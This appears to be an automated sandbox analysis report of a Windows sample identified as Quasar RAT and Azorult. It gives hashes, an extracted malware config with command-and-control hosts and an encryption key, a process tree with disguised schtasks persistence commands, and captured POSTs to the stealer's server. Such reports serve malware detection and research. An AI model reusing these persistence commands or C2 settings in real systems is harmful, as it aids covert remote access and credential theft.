Analysis

  • max time kernel
    3s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2025 23:33

General

  • Target

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe

  • Size

    2.0MB

  • MD5

    b342fc1721147d746388d4bf6c987a04

  • SHA1

    bcb7f37269b927d2607578804be99ce1eb85f72a

  • SHA256

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28

  • SHA512

    2f64b632fa7b9c11f0cad0920ae348f5967535f91a449b2619641c227ca1e89ed9391c80dd3fe4285ff50978f62b573e1824312fdc3daf53ad20c61b1840dca5

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY4:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Ya

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:3012
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3036
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3040
    • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
      "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2588
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2328

Network

  • flag-us
    DNS
    0x21.in
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    8.8.8.8:53
    Request
    0x21.in
    IN A
    Response
    0x21.in
    IN A
    44.221.84.105
  • flag-us
    POST
    http://0x21.in:8000/_az/
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    44.221.84.105:8000
    Request
    POST /_az/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: 0x21.in:8000
    Content-Length: 103
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ded3248e2a265fb55acb3825ed001050|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    ip-api.com
    winsock.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json/
    windef.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 291
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    0x21.in
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    8.8.8.8:53
    Request
    0x21.in
    IN A
    Response
    0x21.in
    IN A
    44.221.84.105
  • flag-us
    POST
    http://0x21.in/_az/
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    44.221.84.105:8000
    Request
    POST /_az/ HTTP/1.0
    Host: 0x21.in
    Connection: close
    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Content-Length: 103
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: text/html
    Connection: close
    Set-Cookie: btst=fe4cac3602af50c4ceae3bb2a00d9c5c|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    GET
    http://ip-api.com/json/
    winsock.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 23:33:06 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 291
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • 5.8.88.191:8080
    svchost.exe
    152 B
    3
  • 44.221.84.105:8000
    http://0x21.in:8000/_az/
    http
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    487 B
    870 B
    5
    5

    HTTP Request

    POST http://0x21.in:8000/_az/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    windef.exe
    328 B
    560 B
    4
    2

    HTTP Request

    GET http://ip-api.com/json/

    HTTP Response

    200
  • 44.221.84.105:8000
    http://0x21.in/_az/
    http
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    476 B
    590 B
    5
    5

    HTTP Request

    POST http://0x21.in/_az/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    winsock.exe
    374 B
    560 B
    5
    2

    HTTP Request

    GET http://ip-api.com/json/

    HTTP Response

    200
  • 5.8.88.191:443
    winsock.exe
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 8.8.8.8:53
    0x21.in
    dns
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    53 B
    69 B
    1
    1

    DNS Request

    0x21.in

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    ip-api.com
    dns
    winsock.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    0x21.in
    dns
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    53 B
    69 B
    1
    1

    DNS Request

    0x21.in

    DNS Response

    44.221.84.105

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\vnc.exe

    Filesize

    405KB

    MD5

    b8ba87ee4c3fc085a2fed0d839aadce1

    SHA1

    b3a2e3256406330e8b1779199bb2b9865122d766

    SHA256

    4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

    SHA512

    7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

  • \Users\Admin\AppData\Local\Temp\windef.exe

    Filesize

    349KB

    MD5

    b4a202e03d4135484d0e730173abcc72

    SHA1

    01b30014545ea526c15a60931d676f9392ea0c70

    SHA256

    7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

    SHA512

    632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

  • memory/2588-28-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2588-40-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2588-36-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

  • memory/2588-30-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2616-46-0x0000000000A60000-0x0000000000ABE000-memory.dmp

    Filesize

    376KB

  • memory/2888-43-0x00000000002B0000-0x00000000002B1000-memory.dmp

    Filesize

    4KB

  • memory/2972-64-0x0000000000990000-0x00000000009EE000-memory.dmp

    Filesize

    376KB

  • memory/3012-49-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

    Filesize

    4KB

  • memory/3012-47-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

  • memory/3012-54-0x00000000003E0000-0x000000000047C000-memory.dmp

    Filesize

    624KB

  • memory/3012-50-0x00000000003E0000-0x000000000047C000-memory.dmp

    Filesize

    624KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.